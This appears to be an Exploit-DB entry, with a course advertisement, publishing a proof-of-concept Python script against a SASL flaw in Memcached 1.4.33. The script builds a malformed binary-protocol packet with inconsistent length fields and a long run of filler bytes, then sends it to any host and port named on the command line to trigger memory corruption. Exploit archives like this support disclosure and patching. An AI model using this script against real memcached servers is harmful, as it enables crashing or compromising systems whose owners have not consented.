Memcached 1.4.33 - 'sasl' (PoC)

EDB-ID:

40697

CVE:

N/A




Platform:

Linux

Date:

2016-11-01


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Source: http://paper.seebug.org/95/

import struct  
import socket  
import sys


MEMCACHED_REQUEST_MAGIC = "\x80"  
OPCODE_SET = "\x21"  
key_len = struct.pack("!H",32)  
body_len = struct.pack("!I",1)  
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len +   body_len*2 + "A"*1000  
if len(sys.argv) != 3:  
    print "./poc_sasl.py <server> <ip>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((sys.argv[1],int(sys.argv[2])))  
s.sendall(packet)  
print s.recv(1024)  
s.close()